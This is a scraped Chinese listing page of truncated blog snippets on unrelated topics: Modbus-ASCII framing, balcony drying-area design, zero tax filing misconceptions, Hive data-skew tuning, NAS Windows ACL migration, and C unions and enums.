Modbus-ASCIl传输模式中&#xff0c;每个字节均以ASCI编码&#xff0c;实际报文中1个字节会以两ASCIl字符发送&#xff0c;因此这种模式比Modbus-RTU模式效率要低。 例如报文数据 x5B "5""B" X35 X42 . 数据帧格式如下: 从ASCI报文帧可以看出&#xff0…

装修听我劝!阳台晾晒区设计4大点。福州中宅装饰,福州装修

亲爱的朋友们&#xff0c;欢迎来到我们的美宅阳台设计课堂&#xff01;如果你的阳台空间想要做一个晾晒区&#xff0c;那么你需要了解一些布置的技巧。今天&#xff0c;我们将从四个方面向大家介绍如何打造一个舒适、实用的阳台晾晒区。让我们一起来看看吧&#xff01; 1️⃣ 合…

你真的了解零申报吗?(零申报常见误区解答)

零申报常见误区解答 误区一&#xff1a;不用缴纳税款零申报 问&#xff1a;我公司为增值税小规模纳税人&#xff0c;当月销售收入可以享受小微企业增值税免税的优惠政策&#xff0c;在申报时&#xff0c;是否可以做零申报。 答&#xff1a;不可以。不用缴纳税款≠零申报&#x…

hive企业级调优策略之数据倾斜

测试所用到的数据参考&#xff1a; 原文链接&#xff1a;https://blog.csdn.net/m0_52606060/article/details/135080511 本教程的计算环境为Hive on MR。计算资源的调整主要包括Yarn和MR。 数据倾斜概述 数据倾斜问题&#xff0c;通常是指参与计算的数据分布不均&#xff0…

企业 NAS 升级,如何解决 Windows ACL 权限迁移和配置?

数字化转型是当前时代的必然趋势&#xff0c;它对于企业的创新能力和竞争力的提升至关重要。企业数字化发展过程中会产生大量的非结构化数据&#xff0c;旧有的存储已经不能完全满足企业需求。因此&#xff0c;相应的存储基础设施需要升级换代&#xff0c;以适应新的业务发展。…

【C语言】自定义类型之联合和枚举

目录 1. 前言2. 联合体2.1 联合体类型的声明2.2 联合体的特点2.3 相同成员的结构体和联合体对比2.4 联合体大小的计算2.4 判断当前机器的大小端 3. 枚举3.1 枚举类型的声明3.2 枚举类型的优点3.3 枚举类型的使用 1. 前言 在之前的博客中介绍了自定义类型中的结构体&#xff0c;…